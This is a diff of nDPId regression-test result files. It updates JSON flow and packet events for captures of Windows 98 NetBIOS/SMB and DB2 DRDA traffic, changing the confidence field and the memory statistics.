00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1576409797554,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409797554,"pkt":"AFBW6YlWAFBWM3ieCABFAABgCQAAAIAR0bfAqO+BwKjvAgCJAIkATA7DAAgpAAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576409798047,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":8,"thread_ts_msec":1576409798047,"pkt":"AQBeAAACAFBWM3ieCABFAAAcCwAAAIABn7TAqO+B4AAAAgoA9f8AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409798047,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00196{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409798642} 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":14,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409798047,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="} 00196{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":19,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409799428} 
@@ -32,14 +32,14 @@ 00367{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409799059,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAV09SS0dST1VQICAgICAgHg=="} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576409800543,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800543,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEAAAAIARybrAqO+BwKjv\/wCJAIkATAq6AAQpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFEAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 
-00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409800543,"flow_last_seen":1576409800543,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409800543,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1576409800544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEQAAAIARyLrAqO+BwKjv\/wCJAIkATHuvAAIpEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAaAAMCo74E="} 
00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1576409800544,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1576409800544,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAABgEgAAAIARx7rAqO+BwKjv\/wCJAIkATA22AAgpEAABAAAAAAABIEVORUVFS0ZDREpESUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEABJPgAAYAAMCo74E="} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":166,"global_ts_msec":1576409802223} 00525{"packet_event_id":1,"packet_event_name":"packet","packet_id":33,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":180,"pkt_type":166,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":180,"pkt_l4_len":0,"thread_ts_msec":1576409802083,"pkt":"AwAAAAABAFBWM3ieAKbw8AMsAP\/vCAAAAAAAAABXT1JLR1JPVVAgICAgICAdTURKUjk4ICAgICAgICAgAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576409807597,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1576409807597,"pkt":"\/\/\/\/\/\/\/\/AFBWM3ieCABFAADlJAAAAIARtTXAqO+BwKjv\/wCKAIoA0Qn+EQIADMCo74EAigC7AAAgRU5FRUVLRkNESkRJQ0FDQUNBQ0FDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAAAAAAAAAAAAAAAhAFYAAwABAAEAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQNg6gAATURKUjk4AAAAAAAAAAAAAAQAAyBAABUEVaoA"} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576409807597,"flow_last_seen":1576409807597,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1576409807597,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00196{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811132} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":43,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":91,"pkt_type":77,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":91,"pkt_l4_len":0,"thread_ts_msec":1576409807597,"pkt":"AFBWM3ieAAwp1HmyAE3g4AP\/\/wBKAAQAAAAAAFBWM3ieBVAAAAAAAAwp1HmyBVL\/U01CKwAAAAAAAAAAAAAAAAACAQwAAAAA0AAyAADBAwEBAAcABEhlbGxvAA=="} 00196{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":44,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":77,"global_ts_msec":1576409811517} 
@@ -334,10 +334,10 @@ 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":213,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQBXT1JLR1JPVVAgICAgICAeTUFSVElOIFJPU0VOQVUgAw=="} 00197{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":47,"global_ts_msec":1576409926307} 00368{"packet_event_id":1,"packet_event_name":"packet","packet_id":214,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":1576409925057,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAAGQAAAAAAAAAAAAAAAAAAAAAATUFSVElOIFJPU0VOQVUgAw=="} -00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
-00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1576409807597,"flow_last_seen":1576409923353,"flow_idle_time":200000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":2817,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1576409798047,"flow_last_seen":1576409798047,"flow_idle_time":140000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"224.0.0.2","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1576409800543,"flow_last_seen":1576409931837,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1576409797553,"flow_last_seen":1576409928060,"flow_idle_time":200000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.2","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1576409807597,"flow_last_seen":1576409923353,"flow_idle_time":200000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":2817,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1576409931837,"l3_proto":"ip4","src_ip":"192.168.239.129","dst_ip":"192.168.239.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":220,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","packets-captured":220,"packets-processed":62,"total-skipped-flows":0,"total-l4-payload-len":5953,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":341,"global_ts_msec":1576409931837} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 220/62 
@@ -347,9 +347,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5874337 bytes -~~ total memory freed........: 5874337 bytes -~~ total allocations/frees...: 118185/118185 +~~ total memory allocated....: 6007971 bytes +~~ total memory freed........: 6007971 bytes +~~ total allocations/frees...: 120947/120947 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 200 chars ~~ json string max len.......: 1903 chars diff --git a/test/results/drda_db2.pcap.out b/test/results/drda_db2.pcap.out index 5b082a94d..bd0b21bef 100644 --- a/test/results/drda_db2.pcap.out +++ b/test/results/drda_db2.pcap.out 
@@ -4,8 +4,8 @@ 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1175543772220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772220,"pkt":"AAwpfMZqAFBWwAABCABFAAAwIqBAAIAGglXAqGoBwKhqgBLvw1AKtGewAAAAAHAC\/\/\/kqAAAAgQFtAEBBAI="} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1175543772221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1175543772221,"pkt":"AFBWwAABAAwpfMZqCABFAAAwAABAAEAG5PXAqGqAwKhqAcNQEu\/9XlZHCrRnsXASFtB6IQAAAgQFtAEBBAI="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1175543772221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1175543772221,"pkt":"AAwpfMZqAFBWwAABCABFAAAoIqFAAIAGglzAqGoBwKhqgBLvw1AKtGex\/V5WSFAQ\/\/+9tQAA"} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} -00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1175543772220,"flow_last_seen":1175543772338,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1175543772338,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} 
+00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1175543772220,"flow_last_seen":1175543810683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":4623,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1175543810683,"l3_proto":"ip4","src_ip":"192.168.106.1","dst_ip":"192.168.106.128","src_port":4847,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DRDA","breed":"Acceptable","category":"Database"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":38,"source":"drda_db2.pcap","alias":"nDPId-test","packets-captured":38,"packets-processed":38,"total-skipped-flows":0,"total-l4-payload-len":4623,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1175543810683} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 38/38 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872593 bytes -~~ total memory freed........: 5872593 bytes -~~ total allocations/frees...: 118153/118153 +~~ total memory allocated....: 6006227 bytes +~~ total memory freed........: 6006227 bytes +~~ total allocations/frees...: 120915/120915 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 457 chars ~~ json string max len.......: 692 chars diff --git a/test/results/dropbox.pcap.out b/test/results/dropbox.pcap.out index 432c47417..ad7cef724 100644 
--- a/test/results/dropbox.pcap.out +++ b/test/results/dropbox.pcap.out 
